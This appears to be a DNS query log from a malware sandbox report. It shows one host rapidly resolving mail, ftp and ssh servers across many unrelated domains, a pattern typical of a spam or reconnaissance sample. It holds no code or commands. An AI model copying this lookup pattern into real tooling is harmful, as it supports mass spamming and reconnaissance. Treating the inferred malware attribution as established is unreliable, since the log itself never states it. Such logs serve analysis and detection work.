Dec 22, 2023 21:14:51.244378090 CET	1.1.1.1	192.168.2.4	0x8d63	No error (0)	zonemx.eu		85.234.244.108	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.251060963 CET	1.1.1.1	192.168.2.4	0x3ca2	No error (0)	racesystems-com-au.mail.protection.outlook.com		104.47.71.202	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.251060963 CET	1.1.1.1	192.168.2.4	0x3ca2	No error (0)	racesystems-com-au.mail.protection.outlook.com		104.47.71.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.255803108 CET	1.1.1.1	192.168.2.4	0x2f0e	Name error (3)	ftp.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.258532047 CET	1.1.1.1	192.168.2.4	0x43ed	Name error (3)	ssh.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.282601118 CET	1.1.1.1	192.168.2.4	0x1f1e	Name error (3)	ftp.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.283339024 CET	1.1.1.1	192.168.2.4	0x9a5c	Name error (3)	ftp.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.286667109 CET	1.1.1.1	192.168.2.4	0x72d3	No error (0)	covicol-com.mail.protection.outlook.com		104.47.18.74	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.286667109 CET	1.1.1.1	192.168.2.4	0x72d3	No error (0)	covicol-com.mail.protection.outlook.com		104.47.17.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.287142992 CET	1.1.1.1	192.168.2.4	0x72d3	No error (0)	covicol-com.mail.protection.outlook.com		104.47.18.74	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.287142992 CET	1.1.1.1	192.168.2.4	0x72d3	No error (0)	covicol-com.mail.protection.outlook.com		104.47.17.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.293113947 CET	1.1.1.1	192.168.2.4	0x59bc	Name error (3)	mail.e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.293992043 CET	1.1.1.1	192.168.2.4	0x743f	Name error (3)	ssh.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.294255018 CET	1.1.1.1	192.168.2.4	0xfbbf	Name error (3)	mail.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.294668913 CET	1.1.1.1	192.168.2.4	0x14a4	Name error (3)	caribbean360-com.p30.spamhero.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.305804014 CET	1.1.1.1	192.168.2.4	0xaf12	Server failure (2)	distraction.com.au	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:51.306385040 CET	1.1.1.1	192.168.2.4	0xaf12	Server failure (2)	distraction.com.au	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:51.310017109 CET	1.1.1.1	192.168.2.4	0x169c	Name error (3)	ssh.acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.315009117 CET	1.1.1.1	192.168.2.4	0x2d1a	No error (0)	smtpv2.ec2.33mail.com		44.194.75.85	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.320560932 CET	1.1.1.1	192.168.2.4	0xa762	No error (0)	mail.oljud.net		192.252.151.25	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.320575953 CET	1.1.1.1	192.168.2.4	0xa762	No error (0)	mail.oljud.net		192.252.151.25	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.338727951 CET	1.1.1.1	192.168.2.4	0xdf68	No error (0)	lpl-org.mail.protection.outlook.com		104.47.66.10	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.338727951 CET	1.1.1.1	192.168.2.4	0xdf68	No error (0)	lpl-org.mail.protection.outlook.com		104.47.55.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.340780973 CET	1.1.1.1	192.168.2.4	0x409d	No error (0)	ftp.demarillac.net	demarillac.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:51.343373060 CET	1.1.1.1	192.168.2.4	0x419b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.9.2	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.343373060 CET	1.1.1.1	192.168.2.4	0x419b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.40.6	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.343373060 CET	1.1.1.1	192.168.2.4	0x419b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.8.32	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.343373060 CET	1.1.1.1	192.168.2.4	0x419b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.9.0	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.343373060 CET	1.1.1.1	192.168.2.4	0x419b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.9.14	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.343373060 CET	1.1.1.1	192.168.2.4	0x419b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.9.5	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.402863979 CET	1.1.1.1	192.168.2.4	0xbba1	No error (0)	mx1.massnegocios.com		200.58.122.206	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.403280020 CET	1.1.1.1	192.168.2.4	0xbba1	No error (0)	mx1.massnegocios.com		200.58.122.206	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.411968946 CET	1.1.1.1	192.168.2.4	0x5596	No error (0)	fb.mail.gandi.net		217.70.178.216	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.411968946 CET	1.1.1.1	192.168.2.4	0x5596	No error (0)	fb.mail.gandi.net		217.70.178.217	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.411968946 CET	1.1.1.1	192.168.2.4	0x5596	No error (0)	fb.mail.gandi.net		217.70.178.215	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.550304890 CET	1.1.1.1	192.168.2.4	0x14a4	Name error (3)	caribbean360-com.p30.spamhero.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.550431013 CET	1.1.1.1	192.168.2.4	0xaf12	Server failure (2)	distraction.com.au	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:51.550590992 CET	1.1.1.1	192.168.2.4	0x409d	No error (0)	ftp.demarillac.net	demarillac.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:51.550844908 CET	1.1.1.1	192.168.2.4	0x2f0e	Name error (3)	ftp.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.550854921 CET	1.1.1.1	192.168.2.4	0xdf68	No error (0)	lpl-org.mail.protection.outlook.com		104.47.66.10	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.550854921 CET	1.1.1.1	192.168.2.4	0xdf68	No error (0)	lpl-org.mail.protection.outlook.com		104.47.55.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.550890923 CET	1.1.1.1	192.168.2.4	0x419b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.9.14	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.550890923 CET	1.1.1.1	192.168.2.4	0x419b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.40.6	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.550890923 CET	1.1.1.1	192.168.2.4	0x419b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.8.32	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.550890923 CET	1.1.1.1	192.168.2.4	0x419b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.9.0	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.550890923 CET	1.1.1.1	192.168.2.4	0x419b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.9.2	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.550890923 CET	1.1.1.1	192.168.2.4	0x419b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.9.5	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.550964117 CET	1.1.1.1	192.168.2.4	0x43ed	Name error (3)	ssh.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.551228046 CET	1.1.1.1	192.168.2.4	0x5596	No error (0)	fb.mail.gandi.net		217.70.178.217	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.551228046 CET	1.1.1.1	192.168.2.4	0x5596	No error (0)	fb.mail.gandi.net		217.70.178.216	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.551228046 CET	1.1.1.1	192.168.2.4	0x5596	No error (0)	fb.mail.gandi.net		217.70.178.215	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.551244020 CET	1.1.1.1	192.168.2.4	0x169c	Name error (3)	ssh.acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.551377058 CET	1.1.1.1	192.168.2.4	0x59bc	Name error (3)	mail.e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.551450014 CET	1.1.1.1	192.168.2.4	0x1f1e	Name error (3)	ftp.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.551460028 CET	1.1.1.1	192.168.2.4	0x9a5c	Name error (3)	ftp.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.551945925 CET	1.1.1.1	192.168.2.4	0x2d1a	No error (0)	smtpv2.ec2.33mail.com		44.194.75.85	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.552098989 CET	1.1.1.1	192.168.2.4	0xfbbf	Name error (3)	mail.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.552191019 CET	1.1.1.1	192.168.2.4	0x743f	Name error (3)	ssh.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.566833973 CET	1.1.1.1	192.168.2.4	0xb5f4	Name error (3)	ssh.mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.566888094 CET	1.1.1.1	192.168.2.4	0xb5f4	Name error (3)	ssh.mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.628566980 CET	1.1.1.1	192.168.2.4	0xb049	Name error (3)	ftp.mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.636303902 CET	1.1.1.1	192.168.2.4	0x382f	No error (0)	mail.omuramba.com		156.38.230.76	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.636367083 CET	1.1.1.1	192.168.2.4	0x382f	No error (0)	mail.omuramba.com		156.38.230.76	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.651993990 CET	1.1.1.1	192.168.2.4	0xaa70	No error (0)	jaydien-com.mx1.arsmtp.com		8.31.233.184	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.661935091 CET	1.1.1.1	192.168.2.4	0x6d0b	No error (0)	www.hugedomains.com		104.26.6.37	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.661935091 CET	1.1.1.1	192.168.2.4	0x6d0b	No error (0)	www.hugedomains.com		172.67.70.191	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.661935091 CET	1.1.1.1	192.168.2.4	0x6d0b	No error (0)	www.hugedomains.com		104.26.7.37	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.696985006 CET	1.1.1.1	192.168.2.4	0x54d	No error (0)	www.org.com		34.206.39.153	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.844815016 CET	1.1.1.1	192.168.2.4	0x71bc	No error (0)	p3m1.ns360.net		218.213.216.3	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.874316931 CET	1.1.1.1	192.168.2.4	0x71bc	No error (0)	p3m1.ns360.net		218.213.216.3	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.206742048 CET	1.1.1.1	192.168.2.4	0xe5c3	Server failure (2)	distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.206756115 CET	1.1.1.1	192.168.2.4	0xe5c3	Server failure (2)	distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.206767082 CET	1.1.1.1	192.168.2.4	0xe5c3	Server failure (2)	distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.228019953 CET	1.1.1.1	192.168.2.4	0xeff7	Name error (3)	mail.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.228039026 CET	1.1.1.1	192.168.2.4	0xeff7	Name error (3)	mail.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.303803921 CET	1.1.1.1	192.168.2.4	0xe575	Name error (3)	mail.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.303818941 CET	1.1.1.1	192.168.2.4	0xe575	Name error (3)	mail.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.329529047 CET	1.1.1.1	192.168.2.4	0xcd9d	Name error (3)	ssh.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.350944996 CET	1.1.1.1	192.168.2.4	0x9704	No error (0)	www.thenile.com.au		104.24.82.4	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.350944996 CET	1.1.1.1	192.168.2.4	0x9704	No error (0)	www.thenile.com.au		104.24.83.4	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.356204987 CET	1.1.1.1	192.168.2.4	0x57fb	No error (0)	sites.google.com		192.178.50.46	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.380810976 CET	1.1.1.1	192.168.2.4	0x70d	Name error (3)	mail.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.404298067 CET	1.1.1.1	192.168.2.4	0xa7f3	Name error (3)	smtp.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.419994116 CET	1.1.1.1	192.168.2.4	0xadec	No error (0)	www.adelaideclub.com		64.68.191.221	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.438990116 CET	1.1.1.1	192.168.2.4	0xc470	No error (0)	www.valentinegrowers.com	cdn1.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:52.438990116 CET	1.1.1.1	192.168.2.4	0xc470	No error (0)	cdn1.wixdns.net	td-ccm-neg-87-45.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:52.438990116 CET	1.1.1.1	192.168.2.4	0xc470	No error (0)	td-ccm-neg-87-45.wixdns.net		34.149.87.45	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.445195913 CET	1.1.1.1	192.168.2.4	0xcd9d	Name error (3)	ssh.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.446230888 CET	1.1.1.1	192.168.2.4	0xf7eb	No error (0)	www.liberty25.org	libertyk12azus.finalsite.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:52.446230888 CET	1.1.1.1	192.168.2.4	0xf7eb	No error (0)	libertyk12azus.finalsite.com	clients.finalsitecdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:52.446230888 CET	1.1.1.1	192.168.2.4	0xf7eb	No error (0)	clients.finalsitecdn.com		104.17.166.123	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.446230888 CET	1.1.1.1	192.168.2.4	0xf7eb	No error (0)	clients.finalsitecdn.com		104.17.165.123	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.446230888 CET	1.1.1.1	192.168.2.4	0xf7eb	No error (0)	clients.finalsitecdn.com		104.17.163.123	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.446230888 CET	1.1.1.1	192.168.2.4	0xf7eb	No error (0)	clients.finalsitecdn.com		104.17.162.123	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.446230888 CET	1.1.1.1	192.168.2.4	0xf7eb	No error (0)	clients.finalsitecdn.com		104.17.164.123	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.446295977 CET	1.1.1.1	192.168.2.4	0xf7eb	No error (0)	www.liberty25.org	libertyk12azus.finalsite.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:52.446295977 CET	1.1.1.1	192.168.2.4	0xf7eb	No error (0)	libertyk12azus.finalsite.com	clients.finalsitecdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:52.446295977 CET	1.1.1.1	192.168.2.4	0xf7eb	No error (0)	clients.finalsitecdn.com		104.17.166.123	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.446295977 CET	1.1.1.1	192.168.2.4	0xf7eb	No error (0)	clients.finalsitecdn.com		104.17.165.123	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.446295977 CET	1.1.1.1	192.168.2.4	0xf7eb	No error (0)	clients.finalsitecdn.com		104.17.163.123	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.446295977 CET	1.1.1.1	192.168.2.4	0xf7eb	No error (0)	clients.finalsitecdn.com		104.17.162.123	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.446295977 CET	1.1.1.1	192.168.2.4	0xf7eb	No error (0)	clients.finalsitecdn.com		104.17.164.123	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.446558952 CET	1.1.1.1	192.168.2.4	0x6f22	No error (0)	trivandrum.german.in		20.197.30.48	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.460989952 CET	1.1.1.1	192.168.2.4	0xa249	No error (0)	pop.yandfcorp.com	pop.secureserver.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:52.460989952 CET	1.1.1.1	192.168.2.4	0xa249	No error (0)	pop.secureserver.net	pop.vox.secureserver.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:52.460989952 CET	1.1.1.1	192.168.2.4	0xa249	No error (0)	pop.vox.secureserver.net	pop.us-phx.vox.secureserver.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:52.460989952 CET	1.1.1.1	192.168.2.4	0xa249	No error (0)	pop.us-phx.vox.secureserver.net		68.178.252.117	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.460989952 CET	1.1.1.1	192.168.2.4	0xa249	No error (0)	pop.us-phx.vox.secureserver.net		173.201.193.97	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.460989952 CET	1.1.1.1	192.168.2.4	0xa249	No error (0)	pop.us-phx.vox.secureserver.net		173.201.193.240	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.460989952 CET	1.1.1.1	192.168.2.4	0xa249	No error (0)	pop.us-phx.vox.secureserver.net		68.178.252.246	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.460989952 CET	1.1.1.1	192.168.2.4	0xa249	No error (0)	pop.us-phx.vox.secureserver.net		68.178.252.116	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.460989952 CET	1.1.1.1	192.168.2.4	0xa249	No error (0)	pop.us-phx.vox.secureserver.net		68.178.252.153	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.460989952 CET	1.1.1.1	192.168.2.4	0xa249	No error (0)	pop.us-phx.vox.secureserver.net		68.178.252.247	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.460989952 CET	1.1.1.1	192.168.2.4	0xa249	No error (0)	pop.us-phx.vox.secureserver.net		68.178.252.154	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.490470886 CET	1.1.1.1	192.168.2.4	0xbad4	Name error (3)	caribbean360-com.p40.spamhero.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.504410028 CET	1.1.1.1	192.168.2.4	0x17f2	No error (0)	www.fotoestudiomiret.com	fotoestudiomiret.arcadina.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:52.504410028 CET	1.1.1.1	192.168.2.4	0x17f2	No error (0)	fotoestudiomiret.arcadina.com	luthien.arcadina.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:52.504410028 CET	1.1.1.1	192.168.2.4	0x17f2	No error (0)	luthien.arcadina.net		167.235.0.29	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.512489080 CET	1.1.1.1	192.168.2.4	0x305c	No error (0)	www.coupons2grab.com		205.178.189.129	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.522787094 CET	1.1.1.1	192.168.2.4	0xd057	No error (0)	www.aikya.org		104.21.69.169	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.522787094 CET	1.1.1.1	192.168.2.4	0xd057	No error (0)	www.aikya.org		172.67.210.143	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.551455021 CET	1.1.1.1	192.168.2.4	0x7b56	No error (0)	www.covicol.com		89.46.108.50	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.582175016 CET	1.1.1.1	192.168.2.4	0x7906	Name error (3)	ftp.mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.582227945 CET	1.1.1.1	192.168.2.4	0x7906	Name error (3)	ftp.mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.681178093 CET	1.1.1.1	192.168.2.4	0x35ea	No error (0)	www.enricobassi.com		62.149.128.40	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.747083902 CET	1.1.1.1	192.168.2.4	0xcf48	No error (0)	www.conquestaccounting.com.au		35.197.165.27	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.752242088 CET	1.1.1.1	192.168.2.4	0xcf48	No error (0)	www.conquestaccounting.com.au		35.197.165.27	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.752490997 CET	1.1.1.1	192.168.2.4	0x7b56	No error (0)	www.covicol.com		89.46.108.50	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.752546072 CET	1.1.1.1	192.168.2.4	0x305c	No error (0)	www.coupons2grab.com		205.178.189.129	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.752593994 CET	1.1.1.1	192.168.2.4	0xd057	No error (0)	www.aikya.org		104.21.69.169	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.752593994 CET	1.1.1.1	192.168.2.4	0xd057	No error (0)	www.aikya.org		172.67.210.143	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.753024101 CET	1.1.1.1	192.168.2.4	0x35ea	No error (0)	www.enricobassi.com		62.149.128.40	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.769171000 CET	1.1.1.1	192.168.2.4	0x6b4f	Name error (3)	mailgate.maroonshockey.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.770600080 CET	1.1.1.1	192.168.2.4	0xbf6e	Name error (3)	pop.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.980645895 CET	1.1.1.1	192.168.2.4	0x820	Name error (3)	ftp.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.981568098 CET	1.1.1.1	192.168.2.4	0xda7c	Name error (3)	ftp.acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.982180119 CET	1.1.1.1	192.168.2.4	0x4a39	Name error (3)	mailgate.williamcroy.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.982232094 CET	1.1.1.1	192.168.2.4	0x4a39	Name error (3)	mailgate.williamcroy.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.015146017 CET	1.1.1.1	192.168.2.4	0xd086	Name error (3)	ftp.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.017183065 CET	1.1.1.1	192.168.2.4	0xf17d	Name error (3)	ftp.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.018829107 CET	1.1.1.1	192.168.2.4	0x7681	Name error (3)	ftp.e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.019792080 CET	1.1.1.1	192.168.2.4	0xdff1	Name error (3)	ftp.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.027086020 CET	1.1.1.1	192.168.2.4	0x34df	Name error (3)	ftp.rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.027442932 CET	1.1.1.1	192.168.2.4	0x925d	Name error (3)	mail.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.029525995 CET	1.1.1.1	192.168.2.4	0xbed6	Name error (3)	ftp.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.029882908 CET	1.1.1.1	192.168.2.4	0x704b	Name error (3)	mail.chemcaregroup.compg	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.031424999 CET	1.1.1.1	192.168.2.4	0xc1a6	Name error (3)	mail.acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.032701969 CET	1.1.1.1	192.168.2.4	0x41a0	Name error (3)	ftp.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.033847094 CET	1.1.1.1	192.168.2.4	0x3437	Name error (3)	mail.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.036983967 CET	1.1.1.1	192.168.2.4	0xdb33	Name error (3)	ftp.chemcaregroup.compg	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.050271988 CET	1.1.1.1	192.168.2.4	0xa73b	Name error (3)	mail.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.050662994 CET	1.1.1.1	192.168.2.4	0x4aca	Name error (3)	ftp.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.052697897 CET	1.1.1.1	192.168.2.4	0xa576	Name error (3)	mail.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.052995920 CET	1.1.1.1	192.168.2.4	0x4a21	Name error (3)	ftp.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.057728052 CET	1.1.1.1	192.168.2.4	0x8078	Name error (3)	mail.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.057744026 CET	1.1.1.1	192.168.2.4	0xbe8	Name error (3)	mail.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.066660881 CET	1.1.1.1	192.168.2.4	0xf5fc	Name error (3)	mail.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.086448908 CET	1.1.1.1	192.168.2.4	0x8fb2	Name error (3)	mail.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.112337112 CET	1.1.1.1	192.168.2.4	0x8c40	Name error (3)	ftp.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.112560987 CET	1.1.1.1	192.168.2.4	0x7084	Name error (3)	mail.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.114151955 CET	1.1.1.1	192.168.2.4	0x8640	Name error (3)	ftp.nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.115387917 CET	1.1.1.1	192.168.2.4	0x8d84	Name error (3)	mail.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.115624905 CET	1.1.1.1	192.168.2.4	0x9567	Name error (3)	ftp.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.121121883 CET	1.1.1.1	192.168.2.4	0x1a55	Name error (3)	mail.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.138932943 CET	1.1.1.1	192.168.2.4	0x1f40	Name error (3)	mail.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.146934986 CET	1.1.1.1	192.168.2.4	0x78f7	Name error (3)	mailgate.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
